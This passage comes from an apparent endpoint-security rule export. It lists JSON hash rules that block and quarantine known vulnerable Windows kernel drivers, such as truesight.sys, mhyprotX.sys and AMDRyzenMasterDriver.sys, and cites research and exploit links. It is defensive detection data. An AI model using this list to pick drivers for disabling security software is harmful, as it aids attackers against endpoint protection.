"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457099Z", + "creation_date": "2026-03-23T11:45:30.457103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e73bb03d54b40035558df2e990367a1c4e9c1ef8e980df6380a63f3bc23e6740", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4c7b05a0-da47-5f77-85f6-34cbb07a5a53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488275Z", + "creation_date": "2026-03-23T11:45:31.488277Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e81366817f6b3eb948e2e321a4f269d87577a4a28d93939502f5d48226dfa0a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4cc183d5-8968-5e24-89aa-65bcb2d09cd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159049Z", + "creation_date": "2026-03-23T11:45:31.159051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7434d979a87f4e94b5dc7d4609527fe966875fea40cf0f74e359b6cbddd5d07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4cdd3d97-4c28-577c-93d1-8cd9774c75fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825160Z", + "creation_date": "2026-03-23T11:45:30.825163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825171Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab95c07bad9f17628528a8194d100eca63d82920c4da51c65183f537e748ddde", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4cf88e37-2007-59cb-aec4-ca7802c0b4fb", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611983Z", + "creation_date": "2026-03-23T11:45:29.611986Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8eed6b4a1e6f7dd66807beeb6ff71f8b34cd8c7777f1e31d326cb87593e8f836", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d00eb26-b42c-5acb-8ad7-5daaff8264e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160203Z", + "creation_date": "2026-03-23T11:45:31.160206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160211Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8ba80ff4af6dd6c03c9db67b1130b034e93305440c3ca68d30126f0850e675d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d067e16-d124-5950-b195-9b7f9ce4be89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491602Z", + "creation_date": "2026-03-23T11:45:31.491605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e3c0b260d1fdaf2b0e3ebe7a7db4091f743cfda4f6ee1c5ec3a6be353beec9c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d11f3bd-0675-58c2-a6b6-22ecd17de901", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975378Z", + "creation_date": "2026-03-23T11:45:29.975379Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975385Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "679de7449908838c031db59234cb4f482fbf5d27d7e02d0c30d5ad9d2f36495f", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d1a1987-284d-5c9c-86d5-c4021db29f03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155171Z", + "creation_date": "2026-03-23T11:45:31.155173Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155178Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72ca07aafc94be8f6f6e5b37003b1645f26bd50fdb3a788e2a3191e0bbf78251", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d1f115f-34f7-574c-8778-2ad46a4bca65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148936Z", + "creation_date": "2026-03-23T11:45:31.148938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148944Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a07307d863085ae5779d8ba13dac5c3a4de25b93294e376775ae93c8d0845b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d2990a5-9628-5e97-8050-da14994367cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473829Z", + "creation_date": "2026-03-23T11:45:31.473833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fd3d76efd5584382b156ca17fe96d0a1c951fee2a804044dc6325d8e85aeef5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d30f7c7-3bcf-5965-9ecd-e54e1027ad99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495956Z", + "creation_date": "2026-03-23T11:45:31.495959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"c58bc7080d7afb1ca252ea6790d2121f247d331f6e208690ea6c02f3d776499e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d403298-5d4a-59db-9f21-cca78b2a2c32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827397Z", + "creation_date": "2026-03-23T11:45:30.827399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827405Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a484ffb9ea9148400fab505d1fedddff288cac81a739b93b2d58ea159e20449d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d4dce75-184a-558e-82fd-1b7dd315d7ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977314Z", + "creation_date": "2026-03-23T11:45:29.977316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977321Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aa8ba45f9524847e2a36c0dc6fd80162923e88dc1be217dde2fb5894c65ff43", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d514121-2000-54a1-94c8-05ec33751eca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144841Z", + "creation_date": "2026-03-23T11:45:31.144843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "227645825c296a3ab08734d67a704b17312d00faf667eea26ee4f89aa32b8545", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d5b0974-848c-5f46-a2ef-b08907062fa7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150738Z", + "creation_date": "2026-03-23T11:45:31.150740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d28a1a5e52f83e97e9437116cbecf0be4e650a157e7a6c98e4864ddf0780d40c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d5b8bdc-82c9-59ba-bb0c-09b749627086", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474180Z", + "creation_date": 
"2026-03-23T11:45:31.474183Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "176a8291782aba65d9fd94b4eec5b413d1c47e83c9e2e892742a7105e74e34cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d5e79db-a1b2-5766-91e0-d741b761d140", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604644Z", + "creation_date": "2026-03-23T11:45:29.604646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6", + "comment": "Vulnerable Kernel Driver (aka mydrivers.sys) [https://www.loldrivers.io/drivers/d9e00cc7-a8f4-4390-a6dc-0f5423e97da4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d5f5b2c-ab51-512e-9578-b3acb90a18cc", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488045Z", + "creation_date": "2026-03-23T11:45:31.488047Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488052Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "528f56c8a2caeee978bf462ae7ada5ecbfa8ca25f7d187fd9c7b660dbd0ca61e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d5fb6ed-fbbe-52aa-a80a-0b00a93d38f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622019Z", + "creation_date": "2026-03-23T11:45:29.622021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.622026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26b8e689a13d3434951559cff24fcfe55edeb7b78c7cc16db1a273c90aa694c1", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d60cb57-a381-532c-ae11-ae0166bdf93f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486553Z", + "creation_date": "2026-03-23T11:45:31.486556Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a919420de7c56f88fd329ddee21f36945175411028c3a5c392d3b007d62a6c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d640f3e-01eb-5a8d-b0bd-738000942b15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142952Z", + "creation_date": "2026-03-23T11:45:31.142954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142960Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9a0fb0557ba307e5a05efa044f1ab83b349c367ccb0a5449cb5a0a31deaa2fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d6b8e50-a927-50af-a765-f307dcf28c1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833289Z", + "creation_date": "2026-03-23T11:45:30.833293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d8872bf582c3a4dd9736f52a16764f4de90260eabd0977a36bbd2b9ef735e7b9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d7bf2ff-3570-5108-a6c2-9df6b7d52aa4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497959Z", + "creation_date": "2026-03-23T11:45:31.497962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a285988e4c8281472bc465cc15a1318ac6dc70cb7a58ac0657400d0e5e199db5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4d8b233d-a336-5618-8de3-37e652a37793", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
